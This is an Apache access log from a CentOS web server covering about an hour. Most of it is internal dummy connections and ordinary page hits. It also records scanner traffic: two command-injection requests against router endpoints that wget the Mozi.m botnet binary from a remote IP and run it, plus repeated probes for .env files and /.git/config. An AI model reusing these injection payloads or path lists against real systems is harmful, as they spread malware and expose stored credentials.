127.0.0.1 - - [21/Mar/2026:12:54:41 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:12:54:42 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:12:54:43 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:12:54:44 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:12:54:45 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:12:55:10 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
112.140.191.204 - - [21/Mar/2026:12:57:26 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://112.140.191.204:54810/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 207 "-" "-"
195.3.221.8 - - [21/Mar/2026:12:58:26 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [21/Mar/2026:12:59:11 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.138.68.113 - - [21/Mar/2026:12:59:39 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
127.0.0.1 - - [21/Mar/2026:13:00:31 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:00:32 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:00:42 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
43.153.36.110 - - [21/Mar/2026:13:01:56 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
206.168.34.41 - - [21/Mar/2026:13:02:22 +0100] "\x16\x03\x01\x01\t\x01" 400 226 "-" "-"
206.168.34.41 - - [21/Mar/2026:13:02:24 +0100] "PRI * HTTP/2.0" 400 226 "-" "-"
127.0.0.1 - - [21/Mar/2026:13:06:40 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
43.130.57.76 - - [21/Mar/2026:13:10:24 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
127.0.0.1 - - [21/Mar/2026:13:10:43 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:10:51 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:10:52 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:10:53 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
206.168.34.44 - - [21/Mar/2026:13:12:06 +0100] "\x16\x03\x01\x01\x02\x01" 400 226 "-" "-"
206.168.34.44 - - [21/Mar/2026:13:12:09 +0100] "PRI * HTTP/2.0" 400 226 "-" "-"
127.0.0.1 - - [21/Mar/2026:13:18:49 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:18:51 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:19:06 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
92.64.21.126 - - [21/Mar/2026:13:19:13 +0100] "-" 408 - "-" "-"
127.0.0.1 - - [21/Mar/2026:13:19:33 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
49.51.203.164 - - [21/Mar/2026:13:22:07 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
103.38.52.39 - - [21/Mar/2026:13:22:19 +0100] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 226 "-" "-"
45.128.156.69 - - [21/Mar/2026:13:22:28 +0100] "GET /.git/config HTTP/1.1" 404 209 "-" "python-requests/2.28.1"
45.128.156.69 - - [21/Mar/2026:13:22:29 +0100] "GET /fedex/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:22:29 +0100] "POST /fedex/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:22:53 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:22:54 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:22:55 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:22:56 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:22:57 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:22:58 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:22:59 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:23:00 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:23:01 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:23:02 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:23:03 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:23:04 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:23:05 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:23:06 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:23:27 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:13:23:28 +0100] "GET /core/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:23:28 +0100] "POST /core/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:24:23 +0100] "GET /api/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:24:23 +0100] "POST /api/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:24:26 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:24:27 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:24:28 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:24:29 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:24:47 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:25:04 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:25:09 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:25:13 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:13:25:24 +0100] "GET /.env.project HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:25:24 +0100] "POST /.env.project HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
149.86.227.60 - - [21/Mar/2026:13:25:31 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0"
204.76.203.212 - - [21/Mar/2026:13:25:57 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.128.156.69 - - [21/Mar/2026:13:26:29 +0100] "GET /private/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:26:29 +0100] "POST /private/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:26:31 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:26:32 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:26:33 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:13:28:26 +0100] "GET /shared/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:28:27 +0100] "POST /shared/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:30:20 +0100] "GET /.env.production HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:30:20 +0100] "POST /.env.production HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:32:25 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:32:26 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:32:27 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:32:33 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:32:43 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:32:51 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:32:52 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:13:33:21 +0100] "GET /back/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:33:21 +0100] "POST /back/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:36:19 +0100] "GET /enviroments/.env.production HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:36:19 +0100] "POST /enviroments/.env.production HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:38:07 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:13:38:16 +0100] "GET /.env.save HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:38:16 +0100] "POST /.env.save HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:40:44 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:40:45 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:13:41:08 +0100] "GET /cms/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:41:08 +0100] "POST /cms/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:42:11 +0100] "GET /cp/.env HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:42:12 +0100] "POST /cp/.env HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:42:15 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:42:16 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:42:27 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
79.124.40.174 - - [21/Mar/2026:13:42:40 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 693 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.128.156.69 - - [21/Mar/2026:13:43:11 +0100] "GET /local/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:43:11 +0100] "POST /local/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:43:15 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:43:32 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:44:10 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:13:44:12 +0100] "GET /.env.development HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:44:12 +0100] "POST /.env.development HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:44:15 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:44:26 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:44:49 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:13:45:12 +0100] "GET /app/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:45:12 +0100] "POST /app/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
206.189.12.81 - - [21/Mar/2026:13:45:54 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:46:33 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:46:35 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:46:41 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:46:43 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:46:53 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
178.128.82.182 - - [21/Mar/2026:13:47:23 +0100] "GET / HTTP/1.1" 200 693 "-" "-"
127.0.0.1 - - [21/Mar/2026:13:47:24 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:25 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:26 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:27 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:28 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:29 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:30 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:31 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:32 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:33 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
